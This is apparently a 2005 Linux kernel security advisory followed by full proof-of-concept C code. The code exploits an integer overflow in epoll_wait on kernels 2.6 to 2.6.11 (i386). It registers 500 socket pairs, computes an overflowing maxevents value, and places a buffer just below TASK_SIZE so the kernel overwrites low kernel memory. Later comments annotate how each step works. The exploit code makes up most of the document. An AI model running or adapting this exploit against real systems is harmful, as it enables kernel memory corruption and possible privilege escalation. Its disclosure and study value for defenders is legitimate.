it is possible to partially overwrite low kernel memory (kernels >= 2.6 and <= 2.6.11)
due to an integer overflow in sys_epoll_wait and misuse of __put_user
in ep_send_events.
tested on i386.
despite the overflow, the os seemingly continues normal operation.
fix:
http://linux.bkbits.net:8080/linux-2.6/cset@422dd06a1p5PsyFhoGAJseinjEq3ew?nav=index.html|ChangeSet@-1d
-------------------------------------------------
/*
* copyright georgi guninski.
* cannot be used in vulnerabilities databases like securityfocus and mitre
* */
#include <stdio.h>
#include <sys/epoll.h>
#include <sys/socket.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#define __KERNEL__
#include <asm/processor.h>
#undef __KERNEL__
#define MAXV 500
int main(int argc,char ** argv)
{
/*
 * Historical (2005) proof of concept for the epoll_wait maxevents overflow
 * described at the top of this post: kernels 2.6 .. 2.6.11 on i386.
 * The event count handed to epoll_wait() is chosen so that
 * count * sizeof(struct epoll_event) wraps, and the destination buffer is
 * placed just below TASK_SIZE so that the kernel's __put_user copy-out in
 * ep_send_events runs past the user/kernel boundary.
 *
 * Builds only against matching 2.6.x kernel headers: TASK_SIZE comes from
 * <asm/processor.h> through the __KERNEL__ define above. On a kernel that
 * carries the referenced fix, maxevents is range-checked before the size
 * multiplication, so the epoll_wait() call below should fail with EINVAL
 * instead of reaching the copy-out. argc/argv are unused.
 */
int epfd;
int i;
int res;
struct epoll_event ev;
int *fds;
int over;       /* maxevents value whose byte-size product wraps 32 bits */
void *km;       /* user buffer positioned just below TASK_SIZE */
/* Smallest count for which count * sizeof(struct epoll_event) exceeds
 * 32 bits. It is stored in an int, which relies on the value being
 * positive for the i386 struct size (it is printed below). */
over= ((unsigned int)-1)/sizeof(struct epoll_event)+1;
/* The same product wraps here as well, so km ends up only a few bytes
 * below TASK_SIZE rather than a full buffer's worth below it. */
km=(void *)(TASK_SIZE - over*sizeof(struct epoll_event) - 4);
/* NOTE(review): %d for a size_t and %x for an int do not match the
 * argument types; harmless on i386 but -Wformat flags it. */
printf("sizeof=%d %x %lx\n",sizeof(struct epoll_event),over,(unsigned long)km);
/* epoll_create, calloc and epoll_ctl results are not checked; only
 * socketpair gets a perror. Acceptable for a throwaway PoC, not for
 * anything reused. */
epfd = epoll_create(MAXV);
printf("Epoll descriptor %i\n",epfd);
fds=calloc(2*MAXV,sizeof(int));
for(i=0;i<MAXV;i++)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, &fds[2*i])) perror("pair");
/* 0x42424242 is presumably a recognisable marker for the bytes the kernel
 * copies out (.data is handed back as-is); the extra bits or'ed into
 * .events beyond EPOLLIN|EPOLLOUT look intended for the same purpose. */
ev.data.u32 = 0x42424242;
ev.events = EPOLLOUT|EPOLLIN | 0x42424242;
res = epoll_ctl(epfd,EPOLL_CTL_ADD,fds[2*i],&ev);
}
/* Make every registered end readable so epoll_wait has MAXV ready events
 * to report in a single call. */
for(i=0;i<MAXV;i++) write(fds[2*i+1],&i,sizeof(i));
/* Presumably flushes dirty data before a possible kernel crash. system()
 * on a fixed string is tolerable here but not a pattern to copy. */
system("sync");
for(i = 0; i < 1; i++)
{
/* The triggering call: maxevents = over, buffer = km (void * converts
 * implicitly to struct epoll_event * in C). */
res = epoll_wait(epfd,km,over,-1);
printf("epoll_wait returned %i\n",res);
printf("check what is after TASK_SIZE\n");
}
close(epfd);
return 42;   /* arbitrary exit status */
}
-----------------------------------------
--
where do you want bill gates to go today?